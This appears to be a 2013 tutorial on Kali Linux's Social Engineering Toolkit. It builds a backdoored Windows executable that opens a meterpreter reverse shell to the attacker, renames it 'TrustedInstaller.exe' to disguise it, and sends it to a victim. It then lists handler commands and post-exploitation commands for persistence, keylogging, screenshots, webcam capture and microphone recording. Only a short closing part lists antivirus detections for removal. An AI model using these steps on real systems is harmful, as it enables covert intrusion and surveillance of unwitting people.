Kali Linux se-toolkit Social Engineering Toolkit

Posted: 11-12-2013

Getting Started

Applications > Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit

1) Social-Engineering Attacks
4) Create a Payload and Listener

Select the localhost machine. Remember: This is the attackers IPv4 address.

verse): 192.168.1.100
2) Windows Reverse_TCP meterpreter | Spawn a meterpreter shell on victim and send back to attacker
16) Backdoored Executable (Best)

Press, "{ENTER}" to select port 443 for the listener.

set:payloads> Port of the listener [443]: {ENTER}

Type, "yes" to start the listener now. There's a way to restart the listener at any time.

set> Start the listener now? [yes|no]: yes

Locate the "msf.exe" in "/usr/share/set" and,

Right Mouse Click > Properties > Permissions > Poperties Execute Allow

Rename "msf.exe" to "TrustedInstaller.exe" and send to victum pc.

Restarting Listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST 192.168.1.100
exploit

Simple Commands	Description
help	Help menu
sessions -v	List all running sessions
sessions -i 1	Opens sessions #1
ps	List running process
migrate 1892	1892 = sessions 1 explorer.exe
run persistence -h	Shows persistences help
run persistence -U -i 5 -p 443 -r 192.168.100.100	Runs .exe on startup
keyscan_start	Starts capturing keystrokes
keyscan_dump	Dump the keystroke buffer
keyscan_stop	Stops captureing keystrokes
screenshot	Grab a screenshot of the interactive desktop
webcam_snap	Take a snapshot from the specified webcam
record_mic	Record audio from the default microphone for X seconds

Removing

As of right now Comodo Internet Secuirty detects the following threat.

TrojWare.Win32.Rozena.A@275288211

C:\Users\john\AppData\Local\Temp\radCC758.tmp\svchost.exe
Parent: wsript.exe(1628)

TrojWare.VBS.TrojanDropper.Agent.fe@299958242

C:\Users\john\AppData\Local\Temp\iktauyz.vbs

Heur.Gen.Lama@117024093

C:\Users\john\Desktop\TrustedInstaller.exe